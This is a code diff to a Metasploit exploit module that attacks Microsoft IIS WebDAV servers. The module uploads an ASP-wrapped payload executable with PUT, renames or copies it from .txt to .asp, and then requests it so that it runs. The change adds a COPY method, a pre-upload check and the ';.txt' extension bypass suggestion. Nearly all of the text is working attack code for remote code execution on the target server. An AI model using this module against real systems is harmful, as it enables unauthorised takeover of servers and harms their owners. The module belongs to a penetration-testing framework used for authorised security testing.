iis_webdav_upload_asp: Add COPY and a few other tricks

modules/exploits/windows/iis/iis_webdav_upload_asp.rb

@@ -42,19 +42,49 @@ class Metasploit3 < Msf::Exploit::Remote
       [
         # The USERNAME and PASSWORD are registered again to make them more obvious they're
         # configurable.
-        OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
-        OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
-        OptString.new('PATH', [ true,  "The path to attempt to upload", '/metasploit%RAND%.asp'])
+      OptString.new('USERNAME',
+        [false, 'The HTTP username to specify for authentication', '']),
+      OptString.new('PASSWORD',
+        [false, 'The HTTP password to specify for authentication', '']),
+      OptString.new('PATH',
+        [ true,  "The path to attempt to upload", '/metasploit%RAND%.asp']),
+      OptEnum.new('METHOD',
+        [true, 'Move or copy the file on the remote system from .txt -> .asp', 'move', ['move','copy']])
       ], self.class)
   end
 
   def exploit
-
     # Generate the ASP containing the EXE containing the payload
     exe  = generate_payload_exe
     asp  = Msf::Util::EXE.to_exe_asp(exe)
     path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s)
-    path_tmp  = path.gsub(/\....$/, ".txt")
+    path = "/" + path if path[0] != "/"
+    # Incase of "/path/to/filename.asp;.txt"
+    path_tmp = "/" + File.basename(path.gsub(/\;.*/,''), ".*") + ".txt"
+    path_tmp = File.dirname(path) + path_tmp if File.dirname(path) != "/"
+    action = datastore['METHOD'].downcase.gsub('e','') + "ing"
+    alt_method = "move"
+    alt_method = "copy" if datastore['METHOD'].upcase == "MOVE"
+
+    #
+    # CHECK
+    #
+    print_status("Checking #{path}")
+    res = send_request_cgi({
+      'uri'          =>  path ,
+      'method'       => 'GET',
+    }, 20)
+
+    if (!res)
+      print_error("Connection timed out while trying to check #{path}")
+      return
+    end
+
+  if (res.code == 200)
+      print_error("File #{path} alrady exists on the target")
+      return
+    end
+
 
     #
     # UPLOAD
@@ -66,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote
         'uri'          =>  path_tmp,
         'method'       => 'PUT',
         'ctype'        => 'application/octet-stream',
-        'data'         => asp,
+        'data'         =>  asp,
       }, 20)
     rescue Errno::ECONNRESET => e
       print_error("#{e.message}. It's possible either you set the PATH option wrong, or IIS doesn't allow 'Write' permission.")
       return
     end
 
-    if (! res)
+    if (!res)
       print_error("Connection timed out while uploading to #{path_tmp}")
       return
     end
@@ -84,30 +114,39 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     #
-    # MOVE
+    # MOVE/COPY
     #
-    print_status("Moving #{path_tmp} to #{path}...")
+    if (path_tmp == path)
+      print_warning("Same filename for PATH and PATH_TEMP detected (#{path_tmp})")
+      print_warning("Do not end PATH with '.txt'")
+    else
+      print_status("#{action.capitalize} #{path_tmp} to #{path}...")
 
-    res = send_request_cgi({
-      'uri'          =>  path_tmp,
-      'method'       => 'MOVE',
-      'headers'      => {'Destination' => path}
-    }, 20)
+      res = send_request_cgi({
+          'uri'          => path_tmp,
+          'method'       => datastore['METHOD'].upcase,
+          'headers'      => {'Destination' => path}
+      }, 20)
 
-    if (! res)
-      print_error("Connection timed out while moving to #{path}")
-      return
-    end
-
-    if (res.code < 200 or res.code >= 300)
-      print_error("Move failed on #{path_tmp} [#{res.code} #{res.message}]")
-      case res.code
-      when 403
-        print_error("IIS possibly does not allow 'Read' permission, which is required to upload executable content.")
+      if (!res)
+        print_error("Connection timed out while moving to #{path}")
+        return
+      end
+
+      if (res.code < 200 or res.code >= 300)
+        print_error("#{datastore['METHOD'].capitalize} failed on #{path_tmp} [#{res.code} #{res.message}]")
+        case res.code
+        when 403
+          print_error("IIS possibly does not allow 'READ' permission, which is required to upload executable content.")
+        end
+        return
+      elsif (res.code == 207)
+        print_warning("#{datastore['METHOD'].capitalize} may have failed. [#{res.code} Response]")
+        print_warning("Try using 'set METHOD #{alt_method}' instead")
       end
-      return
     end
 
+
     #
     # EXECUTE
     #
@@ -118,7 +157,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'method'       => 'GET'
     }, 20)
 
-    if (! res)
+    sleep(2)
+
+    if (!res)
       print_error("Execution failed on #{path} [No Response]")
       return
     end
@@ -126,24 +167,26 @@ class Metasploit3 < Msf::Exploit::Remote
     if (res.code < 200 or res.code >= 300)
       print_error("Execution failed on #{path} [#{res.code} #{res.message}]")
       case res.message
-      when 'Object Not Found'
-        print_error("The MOVE verb failed to rename the file. Possibly IIS doesn't allow 'Script Resource Access'.")
+      when 'Not Found', 'Object Not Found'
+        print_error("The #{datastore['METHOD'].upcase} action failed. Possibly IIS doesn't allow 'Script Resource Access'")
+        print_warning("Try using 'set METHOD #{alt_method}' instead")
+        vprint_warning("Pro Tip: Try 'set PATH /metasploit%RAND%.asp;.txt' instead") if not path.include? ";"
       end
       return
     end
 
 
-
     #
     # DELETE
     #
-    print_status("Deleting #{path}, this doesn't always work...")
+    print_status("Deleting #{path} (this doesn't always work)...")
 
     res = send_request_cgi({
       'uri'          =>  path,
       'method'       => 'DELETE'
     }, 20)
-    if (! res)
+
+    if (!res)
       print_error("Deletion failed on #{path} [No Response]")
       return
     end